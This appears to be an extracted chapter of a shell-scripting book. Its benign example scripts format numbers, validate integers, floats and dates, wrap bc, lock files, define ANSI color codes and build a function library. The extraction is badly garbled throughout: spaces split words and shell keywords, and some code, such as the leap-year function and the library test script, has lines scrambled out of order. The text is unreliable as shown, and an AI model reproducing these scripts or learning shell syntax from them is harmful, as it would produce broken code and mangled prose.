re s ult =" ${T D: ="," }${r emain d er} $ { res u l t} "
# bu i ld s r ig h t to le ft
d one

n ice n um= "$ {th ou sand s}${ resul t }"


i f [ ! - z $2 ] ; th en
ec h o $ ni cen um
fi

D D= "." # d ec ima l poin t de limit e r, t o se p a ra te i n te ge r a n d fr a ct io n al v a lu es


T D= "," # t ho usa nd s de limi ter, t o s e p ara t e e ve ry th re e d i gi ts
w hi le g eto pt s " d: t:" opt; do
c ase $op t in
d ) DD =" $OP TA RG"
;;
t ) TD =" $OP TA RG"
;;
e sac
d on e
s hi ft $ (($ OP TIN D - 1) )
i f [ $ # -e q 0 ] ; the n
e cho "Us ag e: $( base name $0) [ -d c ] [- t c] n um e ri c v al u e"
e cho "
-d sp ec ifie s th e dec i mal p oin t de li mi t er ( d ef a ul t ' .' )"
e cho "
-t sp ec ifie s th e tho u san d s de l i mi te r ( de fa u lt ', ') "
e xit 0
fi
n ic enu m ber $ 1 1

# seco n d a r g fo r c es n ic e nu mb e r t o 'e c ho ' o ut pu t

e xi t 0

How It Works
The heart of this script is the wh ile loop within the ni c e num b er function, which takes the numeric value and
iteratively splits it into the three least significant digits (the three that'll go to the right of the next comma) and the
remaining numeric value. These least significant digits are then fed through the loop again.

Running the Code


To run this script, simply specify a very large numeric value, and the script will add a decimal point and thousands
separators as needed, using either the default values or the characters specified as flags.
Because the function outputs a numeric result, the result can be incorporated within an output message, as
demonstrated here:
e ch o " D o y ou re al ly w ant to pa y $( n i cen u m be r $p r ic e) do l la rs ? "

The Results
$ n ice n umb er 58 94 625
5 ,8 94, 6 25
$ n ice n umb er 58 94 6253 2.43 3
5 89 ,46 2 ,53 2. 433
$ n ice n umb er -d , -t. 5894 62532 . 433
5 89 .46 2 .53 2, 433

Hacking the Script


Different countries use different characters for the thousands and decimal delimiters, hence the addition of flexible
calling flags to this script. For example, Germans and Italians would use -d " ." and -t ", ". The French use -d " ,"
and - t " ", and the Swiss, who have four national languages, use -d " ." and -t "' " . This is a great example of a
situation in which flexible is better than hard-coded, so that the tool is useful to the largest possible user community.
On the other hand, I did hard-code the "." as the decimal separator for input values, so if you are anticipating
fractional input values using a different delimiter, you can change the two calls to c ut that specify a ". " as the
decimal delimiter. Here's one solution:
i nt ege r =$( ec ho $1 | c ut " -d$DD " -f 1 )
# l ef t o f t he de ci m al
d ec ima l =$( ec ho $1 | c ut " -d$DD " -f 2 )
# r ig h t of th e d ec i ma l
This works, but it isn't particularly elegant if a different decimal separator character is used. A more sophisticated
solution would include a test just before these two lines to ensure that the expected decimal separator was the one
requested by the user. We could add this test by using the same basic concept shown in Script #2: Cut out all the
digits and see what's left:
s ep ara t or= "$ (ec ho $1 | se d 's/ [ [:d i g it: ] ] // g' )"
i f [ ! -z "$ sep ar ator " -a "$se p ara t o r" ! = " $D D" ] ; t he n
e cho "$0 : Unk no wn d ecim al se p ara t o r $ s e pa ra to r e nc o un t er ed . " >& 2
e xit 1
fi

#5 Validating Integer Input


As you saw in Script #2, validating integer input seems like a breeze until you want to ensure that negative values are
acceptable too. The problem is that each numeric value can have only one negative sign, which must come at the very
beginning of the value. The validation routine in this script makes sure that negative numbers are correctly formatted,
and, to make it more generally useful, it can also check that values are within a range specified by the user.

The Code
#! /b in /s h
# va li di nt - - V a lid a t es i nt e g er i np u t , a l lo w in g ne g a ti v e i n t s t o o.
fu nc ti on va l idi n t
{
# Va li dat e fi r st f i el d . T h e n t e st a ga i n st mi n va l u e $ 2 a n d /o r
# ma x val u e $ 3 if t he y ar e su p p li e d . I f t h ey a re n ot s up p l ie d , s k i p t he s e t es ts.
nu mb er ="$ 1 ";

m in = " $2 " ;

m a x= " $ 3"

if [ - z $ n umb e r ] ; t h e n
ec ho "Y o u d i dn' t en t e r a n yt h i ng . Un a c ce p ta b l e. " >& 2 ; r e tu r n 1
fi
if [ " ${n u mbe r %${ n u mb e r #? } } " = "- " ] ; th e n
# i s fi r s t c h ar a ' - ' s i gn ?
te st va lu e=" $ {nu m ber # ? }"
# a l l b u t f i r st ch a r ac t e r
el se
te st val u e=" $ num b e r"
fi
no di gi ts= " $(e c ho $ t es t v al u e | s ed ' s/ [ [ :d i gi t : ]] / / g' ) "
if [ ! -z $no d igi t s ] ; t h e n
ec ho "I n val i d n u m be r fo r m at ! On l y d i g it s , n o c o m ma s , s p a ce s , e t c ." >& 2
re tu rn 1
fi

if [ ! -z $mi n ] ; th e n
if [ "$ n umb e r" - l t " $ mi n " ] ; t h e n
e cho "Yo u r v a l ue i s t o o s m al l : s m a ll e st a cc e p ta b l e v a lu e is $ mi n " > & 2
r etu r n 1
fi
fi
if [ ! -z $ma x ] ; th e n
i f [ " $ num b er" - gt " $m a x " ] ; t h en
e cho "Yo u r v a l ue i s t o o b i g: l ar g e st ac c e pt a b le v al u e i s $m a x " > &2
r etu r n 1
fi
fi
re tu rn 0

Running the Script


This entire script is a function that can be copied into other shell scripts or included as a library file. To turn this into a
command, simply append the following to the bottom of the script:
if v al id int "$1 " "$ 2 " " $ 3 " ; th e n
ec ho " Tha t in p ut i s a v al i d i n t eg e r v a l ue wi t h in y ou r co n s tr a i nt s "
fi

The Results
$ va li di nt 1 234 . 3
In va li d num b er f orm a t ! O n ly d ig i t s, n o c o mm a s, s pa c e s, e tc .
$ va li di nt 1 03 1 10 0

Yo ur v al ue
$ va li di nt
Yo ur v al ue
$ va li di nt
Th at i np ut

i s t o o b i g : l a rg e s t a c ce p t ab l e v a lu e is 1 00
- 17 0 25
i s t o o s m a ll : sm a l le s t a c c ep t a bl e v a l ue i s 0
- 17 - 20 2 5
i s a val i d i n t eg e r v a l ue w it h i n y ou r co n s tr a i nt s

Hacking the Script


Notice in this script the following test to see if the number's first character is a negative sign:
if [ " ${ num b er% $ {nu m b er # ? }} " = " - " ] ; t h en
If the first character is a negative sign, t e s tv a l ue is assigned the numeric portion of the integer value. This
nonnegative value is then stripped of digits, and what remains is tested further.
You might be tempted to use a logical AND to connect expressions and shrink some of the nested if statements. For
example, it seems as though the following should work:
if [ ! -z $mi n -a " $n u m be r " - l t " $ m in " ] ; t h e n
e ch o " Y our val u e i s to o sm a l l: s ma l l es t a c c ep t a bl e va l u e i s $ m i n" >& 2
e xi t 1
fi
However, it doesn't work because you can't guarantee in a shell script AND expression that the second condition won't
be tested if the first proves false. It shouldn't be tested, but . . .

#6 Validating Floating-Point Input


Upon first glance, the process of validating a floating-point (or "real") value within the confines and capabilities of a
shell script might seem daunting, but consider that a floating-point number is only two integers separated by a decimal
point. Couple that insight with the ability to reference a different script inline (v a li d in t), and you can see that the
floating-point validation test is surprisingly short.

The Code
# !/ bin / sh
# v ali d flo at -- T ests whe ther a nu m b er i s a v al i d fl o at i ng -p o in t v al ue .
# N ote tha t thi s scri pt c annot acc e p t s c i en ti fi c ( 1. 3 04 e 5) n o ta ti o n.
#
#
#
#

T o t e st wh eth er an ente red v a lue i s a v al id f l oa ti n g- p oi nt nu mb e r, w e


n eed to sp lit t he v alue at t h e d e c ima l po in t. We t h en te st th e f ir st pa rt
t o s e e i f it' s a va lid integ e r, t h en t e st t he se co n d p ar t t o se e i f i t' s a
v ali d >= 0 int eg er, so - 30.5 i s v a l id, b ut - 30 . -8 i s n' t .

. v ali d int

# Bo urne she ll no t ati o n to s ou rc e t he v a li d in t f un ct i on

v al idf l oat ()
{
f val u e=" $1 "
i f [ ! - z $(e ch o $f valu e | s e d ' s / [^. ] / /g ') ] ; th e n
de c ima lP art =" $(ec ho $ fvalu e | c u t - d . - f1 )"
fr a cti on alP ar t="$ (ech o $fv a lue | cu t -d . -f 2 )"
if [ ! - z $ de cima lPar t ] ; the n
i f ! v ali di nt " $dec imalP a rt" " " " " ; th en
re tu rn 1
fi
fi
if [ " ${ fra ct iona lPar t%${f r act i o nal P a rt #? }} " = " - " ] ; t h en
e cho " Inv al id f loat ing-p o int n umb e r : '- ' n ot a l lo w ed \
af te r d ec imal poi nt" > & 2
r etu rn 1
fi
if [ " $f rac ti onal Part " != " " ] ; th e n
i f ! v ali di nt " $fra ction a lPa r t " " 0 " " " ; t he n
re tu rn 1
fi
fi
if [ " $d eci ma lPar t" = "-" - o - z "$d e c im al Pa r t" ] ; t he n
i f [ - z $ fr acti onal Part ] ; t h en
ec ho "I nv alid flo ating - poi n t fo r m at ." > & 2 ; r et u rn 1
fi
fi
e lse
if [ " $f val ue " = "-" ] ; t h en
e cho " Inv al id f loat ing-p o int f orm a t ." > &2 ; re t ur n 1
fi

fi
}

if ! v al idi nt "$f valu e" "" "" ; the n


r etu rn 1
fi

r etu r n 0

Running the Script


If no error message is produced when the function is called, the return code is 0, and the number specified is a valid
floating-point value. You can test this script by appending the following few lines to the end of the code just given:
i f val i dfl oa t $ 1 ; th en
e cho "$1 i s a v alid flo ating - poi n t va l u e"
fi
e xi t 0

The Results
$ v ali d flo at 12 34 .56
1 23 4.5 6 is a va li d fl oati ng-po i nt v a lue
$ v ali d flo at -1 23 4.56
- 12 34. 5 6 i s a v al id f loat ing-p o int v alu e
$ v ali d flo at -. 75
- .7 5 i s a va lid f loat ing- point val u e
$ v ali d flo at -1 1. -12
I nv ali d fl oa tin g- poin t nu mber: '-' n ot a l lo we d a ft er de c im al po in t
$ v ali d flo at 1. 03 44e2 2
I nv ali d nu mb er fo rmat ! On ly di g its , no c o mm as , s pa ce s , e tc .
Debugging the debugging

If you see additional output at this point, it might be because you added
a few lines to test out v a li di n t earlier, but forgot to remove them
when you moved on to this script. Simply go back to v al i di nt and
ensure that the last few lines that run the function are commented out
or deleted.

Hacking the Script


A cool additional hack would be to extend this function to allow scientific notation, as demonstrated in the last example.
It wouldn't be too difficult. You'd test for the presence of ' e ' or 'E ' and then split the result into three segments: the
decimal portion (always a single digit), the fractional portion, and the power of ten. Then you just need to ensure that
each is a va lid in t.

#7 Validating Date Formats


One of the most challenging validation tasks, but one that's crucial for shell scripts that work with dates, is to ensure
that a specific date is actually possible. If we ignore leap years, this task is not too bad, because the calendar is well
behaved and consistent each year. All we need in that case is a table with the days of each month against which to
compare a specified date. To take leap years into account, you have to add some additional logic to the script. One set
of rules for calculating a leap year is as follows:
Years not divisible by 4 are not leap years.
Years divisible by 4 and by 400 are leap years.
Years divisible by 4, not divisible by 400, and divisible by 100, are not leap years.
All other years divisible by 4 are leap years.
Notice how this script utilizes norm date (Script #3) to ensure a consistent date format before proceeding.

The Code
# !/ bin / sh
# v ali d -da te -- V alid ates a da t e, t a kin g in to a c co un t l e ap y e ar r u le s.
e xc eed s Day sI nMo nt h()
{
# Gi v en a mon th nam e, r eturn 0 i f the s pe ci fi e d da y v a lu e i s
# le s s t ha n o r equa l to the m ax d a ys i n t he m o nt h; 1 o th er w is e
c ase $(e ch o $ 1| tr ' [:up per:] ' '[ : l owe r : ]' ) in
ja n * ) d ays =3 1
;;
feb* ) d a y s=2 8
;;
ma r * ) d ays =3 1
;;
apr* ) d a y s=3 0
;;
ma y * ) d ays =3 1
;;
jun* ) d a y s=3 0
;;
ju l * ) d ays =3 1
;;
aug* ) d a y s=3 1
;;
se p * ) d ays =3 0
;;
oct* ) d a y s=3 1
;;
no v * ) d ays =3 0
;;
dec* ) d a y s=3 1
;;
* ) ec ho "$ 0: Unk nown mont h na m e $1 " >& 2; e x it 1
esa c

if [ $2 - lt 1 -o $ 2 -g t $da y s ] ; th e n
r e tur n 1
els e
r e tur n 0
# the day numb e r i s val i d
fi

i sL eap Y ear ()
{
# Th i s f un cti on ret urns 0 if a l e a p y e a r; 1 o t he rw i se .
# Th e fo rm ula f or c heck ing w h eth e r a y e ar i s a l ea p y e ar i s :
# 1. Yea rs no t divi sibl e by 4 ar e not l ea p ye a rs .
# 2. Yea rs di vi sibl e by 4 an d by 4 00 a r e le ap ye ar s .
# 3. Yea rs di vi sibl e by 4, n o t d i v isi b l e by 4 0 0, a n d d iv is i bl e b y 10 0 ,
# ar e no t lea p year s.
# 4. All o the r year s di visib l e b y 4 a r e l ea p y ea rs .

y ear = $1
i f [ "$( (y ear % 4)) " -n e
re t urn 1 # no pe, not a
e lif [ " $( (ye ar % 4 00)) "
re t urn 0 # ye s, i t's a
e lif [ " $( (ye ar % 1 00)) "
re t urn 1
e lse
re t urn 0
fi

0 ] ; then
lea p ye a r
-eq 0 ] ; th e n
lea p ye a r
-eq 0 ] ; th e n

# # Beg i n m ai n s cr ipt
i f [ $ # -n e 3 ] ; the n
e cho "Us ag e: $0 mon th d ay ye a r" > & 2
e cho "Ty pi cal i nput for mats a re A u gus t 3 19 62 an d 8 3 20 02 " > &2
e xit 1
fi
# N orm a liz e dat e and spli t bac k ou t ret u r ne d va l ue s
n ew dat e ="$ (n orm da te " $@") "
i f [ $ ? -e q 1 ] ; the n
e xit 1
# err or c ondit i on a l rea d y r ep or t ed b y n o rm da t e
fi
m on th= " $(e ch o $ ne wdat e | cut - d \ - f 1 )"
d ay= " $(e ch o $ ne wdat e | cut - d \ - f 2 )"
ye ar= " $(e ch o $ ne wdat e | cut - d \ - f 3 )"
# N ow t hat w e h av e a norm alize d da t e , l e t 's c he c k to se e i f t he
# d ay v alu e is lo gica l
i f ! e x cee ds Day sI nMon th $ month "$2 " ; t h e n
i f [ "$m on th" = "Fe b" - a "$2 " -e q "29 " ] ; th e n
if ! i sL eap Ye ar $ 3 ; then
e cho " $0: $ 3 is not a le a p y e a r, s o F eb d o es n' t h a ve 2 9 d ay s " >& 2
e xit 1
fi
e lse
ec h o " $0 : b ad day val ue: $ m ont h doe s n 't h av e $ 2 d ay s " >& 2
ex i t 1
fi
fi
e ch o " V ali d dat e: $ne wdat e"
e xi t 0

Running the Script


To run the script, simply specify a date on the command line, in "month day year" format. The month can be a threeletter abbreviation, a full word, or a numeric value; the year must be four digits.

The Results
$ v ali d -da te au gu st 3 196 0
V al id d ate : Aug 3 196 0
$ v ali d -da te 9 31 200 1
v al id- d ate : bad d ay v alue : Sep doe s n 't h a ve 3 1 d ay s
$ v ali d -da te fe b 29 2 004
V al id d ate : Feb 2 9 20 04
$ v ali d -da te fe b 29 2 006
v al id- d ate : 200 6 is n ot a leap yea r , so F eb d oe s n' t h av e 2 9 d ay s

Hacking the Script


A roughly similar approach to this script could validate time specifications, either using a 24-hour clock or with an ante
meridiem/post meridiem (am/pm) suffix. Split the value at the colon, ensure that the minutes and seconds (if specified)
are between 0 and 60, and then check that the first value is between 0 and 12 if allowing am/pm, or between 0 and 24
if you prefer a 24-hour clock. (Fortunately, while there are leap seconds and other tiny variations in time to help keep
the calendar balanced, we can safely ignore them on a day-to-day basis.)

#8 Sidestepping Poor Echo Implementations


While most modern Unix and Linux implementations have a version of the e c ho command that knows that the - n flag
should cause the program to suppress the trailing newline, not all implementations work that way. Some use \ c as a
special embedded character to defeat the default behavior, and others simply insist on including the trailing newline
regardless.
Figuring out whether your particular ech o is well implemented is easy: Simply type in the following on the command
line and see what happens:
$ e cho -n "T he ra in i n Sp ain"; ech o " f a l ls m ai n ly o n t h e Pl a in "
If your e cho works with the -n flag, you'll see:
T he ra i n i n Spa in fal ls m ainly on t h e P l a in
If it doesn't, you'll see this:
- n The rai n in Sp ain
f al ls m ain ly on t he P lain
Ensuring that the script output is presented to the user as desired is quite important and will certainly become
increasingly important as our scripts become more interactive.

The Code
There are as many ways to solve this quirky ec h o problem as there are pages in this book. One of my favorites is
very succinct:
f un cti o n e ch on
{
e cho "$* " | a wk '{ prin tf "% s " $ 0 }'
}
You may prefer to avoid the overhead incurred when calling the a wk command, however, and if you have a user-level
command called p rin tf you can use it instead:
e ch on( )
{
p rin t f " %s " " $* "
}
But what if you don't have p rint f and you don't want to call a wk ? Then use the tr command:
e ch on( )
{
e cho "$* " | t r -d ' \n'
}
This method of simply chopping out the carriage return with tr is a simple and efficient solution that should be quite
portable.

Running the Script


When using this script, you can simply replace calls to e cho with e c ho n, which will leave the cursor at the end of the
line, rather than automatically appending a carriage return:
e ch on " Ent er co or dina tes for s a tel l i te a c qu is it i on : "

#9 An Arbitrary-Precision Floating-Point Calculator


One of the most commonly used sequences in script writing is $ ( () ), which lets you perform calculations using
various rudimentary mathematical functions. This sequence can be quite useful, most commonly when incrementing
counter variables, and it supports addition, subtraction, division, remainder, and multiplication, though not any sort of
fractional or decimal value. Thus, the following command returns 0, not 0.5:
e ch o $ ( (1 / 2))
So when calculating values that need better precision, you've got a challenge on your hands. There just aren't many
good calculator programs that work on the command line. Except, that is, for b c, an oddball program that few Unix
people are taught. Billing itself as an arbitrary-precision calculator, the bc program harkens back to the very dawn of
Unix, with its cryptic error messages, complete lack of prompts, and assumption that if you're using it, you already know
what you're doing. But that's okay. We can cope.

The Code
# !/ bin / sh
# s cri p tbc - Wr ap per for 'bc' t hat r etu r n s th e r es ul t o f a c a lc ul a ti on .
i f [ $ 1 = "- p" ] ; th en
p rec i sio n= $2
s hif t 2
e ls e
p rec i sio n= 2
# defa u lt
fi
b c -q < < E OF
s ca le= $ pre ci sio n
$*
q ui t
E OF
e xi t 0

How It Works
This script demonstrates the useful here document capability in shell scripting. The << notation allows you to include
material in the script that is treated as if it were taken directly from the input stream, which in this case allows an easy
mechanism for handing commands to the bc program.
This is also our first script that demonstrates how command arguments can be utilized within a script to enhance the
flexibility of a command. Here, if the script is invoked with a - p flag, it allows you to specify the desired scale. If no
scale is specified, the program defaults to s ca le = 2 .
When working with bc, it's critical to understand the difference between l e ng t h and sc al e . As far as bc is
concerned, l en gth refers to the total number of decimal digits in the number, while sc a le is the total number of
digits after the decimal point. Thus, 10.25 has a l e n gth of four and a s ca l e of two, while 3.14159 has a l en gt h
of six and a s cal e of five.
By default, bc has a variable value for l engt h , but because it has a sc al e of zero, bc without any modifications
works exactly as the $( () ) notation does. Fortunately, if you add a s ca le setting to bc , you find that there's lots of
hidden power under the hood, as shown here:
$ bc
b c 1.0 5
C op yri g ht 19 91, 1 992, 199 3, 19 9 4, 1 9 97, 1 99 8 Fr e e So f tw a re F o un da t io n, In c.
T hi s i s fr ee so ft ware wit h ABS O LUT E L Y N O WA RR AN T Y.
F or de t ail s typ e `war rant y'.
s ca le= 1 0
( 20 02- 1 962 )* 365
1 46 00
1 46 00/ 7
2 08 5.7 1 428 57 142

q ui t
To allow access to the bc capabilities from the command line, a wrapper script has to silence the opening copyright
information, if present, even though most b c implementations know that they should silence the header if their input
isn't the terminal (st di n). The wrapper also sets the s c ale to a reasonable value, feeds in the actual expression to
the b c program, and then exits with a quit command.

Running the Script


To run this script, feed a mathematical expression to the program as an argument.

The Results
$ s cri p tbc 1 460 0/ 7
2 08 5.7 1
$ s cri p tbc - p 1 0 1460 0/7
2 08 5.7 1 428 57 142

#10 Locking Files


Any script that reads or appends to a shared data file, such as a log file, needs a reliable way to lock the file so that
other instantiations of the script don't step on the updates. The idea is that the existence of a separate lock file serves
as a semaphore, an indicator that a different file is busy and cannot be used. The requesting script waits and tries
again, hoping that the file will be freed up relatively promptly, denoted by having its lock file removed.
Lock files are tricky to work with, though, because many seemingly foolproof solutions fail to work properly. For
example, the following is a typical approach to solving this problem:
w hi le [ -f $ loc kf ile ] ; do
s lee p 1
d on e
t ou ch $ loc kf ile
Seems like it would work, doesn't it? You loop until the lock file doesn't exist, then create it to ensure that you own the
lock file and can therefore modify the base file safely. If another script with the same loop sees your lock, it will spin
until the lock file vanishes. However, this doesn't in fact work, because while it seems that scripts are run without being
swapped out while other processes take their turn, that's not actually true. Imagine what would happen if, just after the
d on e in the loop just shown, but before the to u ch, this script was swapped out and put back in the processor queue
while another script was run instead. That other script would dutifully test for the lock file, find it missing, and create its
own version. Then the script in the queue would swap back in and do a t o uc h , with the result that two scripts would
both think they had exclusive access, which is bad.
Fortunately, Stephen van den Berg and Philip Guenther, authors of the popular pr o cm ai l email filtering program,
include a loc kf ile command that lets you safely and reliably work with lock files in shell scripts.
Many Unix distributions, including Linux and Mac OS X, have l oc kf il e already installed. You can check whether
your system has l oc kfi le simply by typing m a n 1 l ock f i le . If you get a man page, you're in luck! If not,
download the p ro cma il package from ht tp :/ / w ww. p r ocm a il . or g/ and install the l o ck fi l e command on
your system. The script in this section assumes that you have the lo c kf il e command, and subsequent scripts
(particularly in Chapter 7, "Web and Internet Users") require the reliable locking mechanism of Script #10.

The Code
# !/ bin / sh
# f ile l ock - A fl exib le
r et rie s ="1 0"
a ct ion = "lo ck "
n ul lcm d ="/ bi n/t ru e"

f ile l o cki n g me c h an is m.
# defa u lt n u mbe r of r et r ie s
# defa u lt a c tio n
# null com m a nd f o r lo ck f il e

w hi le g eto pt s " lu r:" opt; do


c ase $op t in
l ) ac ti on= "l ock"
;;
u ) ac ti on= "u nloc k"
;;
r ) re tr ies =" $OPT ARG"
;;
e sac
d on e
s hi ft $ (($ OP TIN D - 1) )
i f [ $ # -e q 0 ] ; the n
c at < < E OF >& 2
U sa ge: $0 [- l|- u] [-r ret ries] loc k f ile n a me
W he re - l r eq ues ts a l ock (the d efa u l t), - u re qu e st s a n u nl oc k , -r X
s pe cif i es a max im um n umbe r of r etr i e s b e f or e it fa il s ( d ef au l t = $ re tr i es ).
E OF
e xit 1
fi
# A sce r tai n whe th er w e ha ve lo c kf o r lo c k fi le s y st em ap p s
i f [ - z "$ (w hic h lock file | gr e p - v '^n o ') " ] ; t he n
e cho "$0 f ail ed : 'l ockf ile' u til i t y n o t f ou nd in P A TH . " >& 2
e xit 1
fi

i f [ " $ act io n" = "loc k" ] ; th e n


i f ! loc kf ile - 1 -r $re tries "$1 " 2> / d ev /n ul l ; th e n
ec h o " $0 : F ai led: Cou ldn't cre a t e l o c kf il e i n ti m e" >& 2
ex i t 1
fi
e ls e
# ac tio n = un lock
i f [ ! - f "$1 " ] ; then
ec h o " $0 : W ar ning : lo ckfil e $1 d oes n ' t ex is t t o u nl o ck " > &2
ex i t 1
fi
r m - f "$ 1"
fi
e xi t 0

Running the Script


While the lo ck fil e script isn't one that you'd ordinarily use by itself, you can try to test it by having two terminal
windows open. To create a lock, simply specify the name of the file you want to try to lock as an argument of
f il elo c k. To remove the lock, add the -u flag.

The Results
First, create a locked file:
$ f ile l ock / tmp /e xclu sive .lck
$ l s - l /t mp /ex cl usiv e.lc k
- r- -r- - r-1 t ay lor
whe el 1 Mar 2 1 1 5 : 35 / tm p /e xc l us i ve .l c k
The second time you attempt to lock the file, f ile l o ck tries the default number of times (ten) and then fails, as
follows:
$ f ile l ock / tmp /e xclu sive .lck
f il elo c k : F ail ed : Co uldn 't cr e ate l ock f i le i n t im e
When the first process is done with the file, you can release the lock:
$ f ile l ock - u / tm p/ex clus ive.l c k
To see how the fil el ock script works with two terminals, run the unlock command in one window while the other
window spins trying to establish its own exclusive lock.

Hacking the Script


Because this script relies on the existence of a lock file as proof that the lock is still enforced, it would be useful to have
an additional parameter that is, say, the longest length of time for which a lock should be valid. If the l o ck fi l e
routine times out, the last accessed time of the locked file could then be checked, and if the locked file is older than the
value of this parameter, it can safely be deleted as a stray, perhaps with a warning message, perhaps not.
This is unlikely to affect you, but loc kfile doesn't work with NFS-mounted disks. In fact, a reliable file locking
mechanism on an NFS-mounted disk is quite complex. A better strategy that sidesteps the problem entirely is to create
lock files only on local disks.

#11 ANSI Color Sequences


Although you probably don't realize it, your standard terminal application supports different styles of presenting text.
Quite a few variations are possible, whether you'd like to have certain words in your script displayed in bold, or even in
red against a yellow background. However, working with ANSI (American National Standards Institute) sequences to
represent these variations can be difficult because these sequences are quite user unfriendly. Therefore, this script
fragment creates a set of variables, whose values represent the ANSI codes, that can turn on and off the various color
and formatting display capabilities.

The Code
# !/ bin / sh
# A NSI Col or -- U se t hese vari a ble s to m a ke o ut p ut i n d i ff er e nt c o lo rs
# a nd f orm at s. Co lor name s tha t en d wit h 'f ' ar e f or e gr o un d ( te xt ) c ol o rs ,
# a nd t hos e end in g wi th ' b' ar e ba c k gro u n d co lo r s.
i ni tia l ize AN SI( )
{
e sc= " \03 3" # if thi s do esn't wor k , en t e r an E S C di r ec t ly

b lac k f=" ${ esc }[ 30m" ;


y ell o wf= "$ {es c} [33m "
c yan f ="$ {e sc} [3 6m";

redf= " ${e s c }[3 1 m ";


bluef = "${ e s c}[ 3 4 m" ;
white f ="$ { e sc} [ 3 7m "

g re en f =" $ {e sc } [3 2m "
p ur pl e f= " ${ es c }[ 35 m "

b lac k b=" ${ esc }[ 40m" ;


y ell o wb= "$ {es c} [43m "
c yan b ="$ {e sc} [4 6m";

redb= " ${e s c }[4 1 m ";


blueb = "${ e s c}[ 4 4 m" ;
white b ="$ { e sc} [ 4 7m "

g re en b =" $ {e sc } [4 2m "
p ur pl e b= " ${ es c }[ 45 m "

b old o n=" ${ esc }[ 1m";


i tal i cso n= "${ es c}[3 m";
u lon = "${ es c}[ 4m ";
i nvo n ="$ {e sc} [7 m";

boldo f f=" $ { esc } [ 22 m"


itali c sof f = "${ e s c} [2 3m "
uloff = "${ e s c}[ 2 4 m"
invof f ="$ { e sc} [ 2 7m "

r ese t ="$ {e sc} [0 m"

How It Works
If you're used to HTML, you might be a bit baffled by the way these sequences work. In HTML, you open and close
modifiers in opposite order, and you must close every modifier you open. So to create an italicized passage within a
sentence displayed in bold, you'd use the following HTML:
< b> thi s is i n b ol d an d <i >this is i t ali c s </ i> w i th in th e b ol d </ b>
Closing the bold tag without closing the italics wreaks havoc and can crash some Web browsers. But with the ANSI
color sequences, some modifiers replace the previous modifier, and all modifiers are closed with a single reset
sequence. With ANSI sequences, you must make sure to output the reset sequence after colors and to use the "off"
feature for anything you turn on. Using the variable definitions in this script, you would write the previous sequence as
follows:
$ {b old o n}t hi s i s in b old and $ { ita l i cso n } th is i s
i ta lic s ${i ta lic so ff}w ithi n the bol d $ {re s e t}

Running the Script


To run this script, we'll need to initialize all the ANSI sequences and then output a few e ch o statements with different
combinations of color and type effect:
i ni tia l ize AN SI
c at << EOF
$ {y ell o wf} Th is is a p hras e in y ell o w ${r e d b} a nd re d$ { re s et }
$ {b old o n}T hi s i s bold ${ul on} t h is i s it a l ic s$ {r e se t} by e b ye
$ {i tal i cso n} Thi s is i tali cs${i t ali c s off } an d th i s is no t
$ {u lon } Thi s is ul ${ul off} and t his i s n o t

$ {i nvo n }Th is is i nv${ invo ff} a n d t h i s i s no t


$ {y ell o wf} ${ red b} Warn ing I ${y e llo w b }${ r e df }W ar n in g I I$ { re se t }
E OF

The Results
The appearance of the results isn't too thrilling in this book, but on a display that supports these color sequences it
definitely catches your attention:
T hi s i s a ph ras e in y ello w and red
T hi s i s bo ld th is is ital ics b y e b y e
T hi s i s it al ics a nd t his is no t
T hi s i s ul a nd th is i s no t
T hi s i s in v and t his is n ot
W ar nin g I Wa rni ng II

Hacking the Script


When using this script, you may see something like the following:
\ 03 3[3 3 m\0 33 [41 mW arni ng!\ 033[4 3 m\0 3 3 [31 m W ar ni ng ! \0 33 [ 0m
If you do, the problem might be that your terminal or window doesn't support ANSI color sequences, but it also might
simply be that the \03 3 notation for the all-important e s c variable isn't understood. To remedy the latter problem,
open up the script in the v i editor or your favorite editor, replace the \ 03 3 sequence with a ^V sequence, and then
press the ESC key. You should see ^ [ displayed, so the results on screen look like e sc =" ^ [" and all should work
fine.
If, on the other hand, your terminal or window doesn't support ANSI color sequences, you might want to upgrade so
that you can add colorized and type-face-enhanced output to your other scripts.

#12 Building a Shell Script Library


Many of the scripts in this chapter have been written as functions rather than as stand-alone scripts so that they can
be easily and gracefully incorporated into other scripts without incurring the overhead of making system calls. While
there's no #in clu de feature in a shell script, as there is in C, there is a tremendously important capability called
sourcing a file that serves the same purpose.
To see why this is important, let's consider the alternative. If you invoke a shell script within a shell, by default that
script is run within its own subshell. You can immediately prove this experimentally:
$ c at t iny sc rip t. sh
t es t=2
$ t est = 1
$ t iny s cri pt .sh
$ e cho $te st
1
Because this script changed the value of the variable tes t within the subshell running the script, the value of the
existing t est variable in the current shell's environment was not affected. If you instead use the "." source notation to
run the script, it is handled as though each command in the script was typed directly into the current shell:
$ . ti n ysc ri pt. sh
$ e cho $te st
2
As you might expect, if you have an exit 0 command within a script that's sourced, for example, it will exit that shell
and log out of that window.

The Code
To turn the functions in this chapter into a library for use in other scripts, extract all the functions and concatenate them
into one big file. If we call this file l ibra ry.s h , a test script that accesses all of the functions might look like this:
# !/ bin / sh
# L ibr a ry te st sc ript
. l ibr a ry. sh
i ni tia l ize AN SI
e ch on " Fir st of f, do you have e cho i n y o u r pa th ? ( 1= y es , 2 =n o ) "
r ea d a n swe r
w hi le ! va li din t $ans wer 1 2 ; do
e cho n "$ {b old on }Try aga in${b o ldo f f }. D o y ou h a ve e c ho "
e cho n "i n you r path ? (1 =yes, 2=n o ) "
r ead ans we r
d on e
i f ! c h eck Fo rCm dI nPat h "e cho" ; th e n
e cho "No pe , c an 't f ind the e c ho c o mma n d ."
e ls e
e cho "Th e ech o comm and is in the P ATH . "
fi
e ch o " "
e ch on " Ent er a ye ar y ou t hink m igh t be a le ap y e ar : "
r ea d y e ar
w hi le ! va li din t $yea r 1 9999 ; do
e cho n "P le ase e nter a y ear i n th e ${b o l do n} co r re ct $ {b o ld of f } fo r ma t: "
r ead yea r
d on e
i f isL e apY ea r $ ye ar ; the n
e cho "${ gr een f} You' re r ight!
e ls e

$y e a r w a s a l ea p y ea r .$ { re se t }"

fi

e cho "${ re df} No pe, that 's no t a l e ap y e ar .$ {r e se t} "

e xi t 0
Notice that the library is incorporated, and all functions are read and included in the run-time environment of the script,
with the single line
. l ibr a ry. sh
This is a useful approach in working with the many scripts in this book, and one that can be exploited again and again
as needed.

Running the Script


To run the test script given in the previous section, simply invoke it at the command line.

The Results
$ l ibr a ry- te st
F ir st o ff, d o y ou hav e ec ho in you r pat h ? ( 1= ye s , 2= n o) 1
T he ec h o c om man d is i n th e PAT H .
E nt er a ye ar yo u thin k mi ght b e a l e ap y e ar : 43 2 42 3
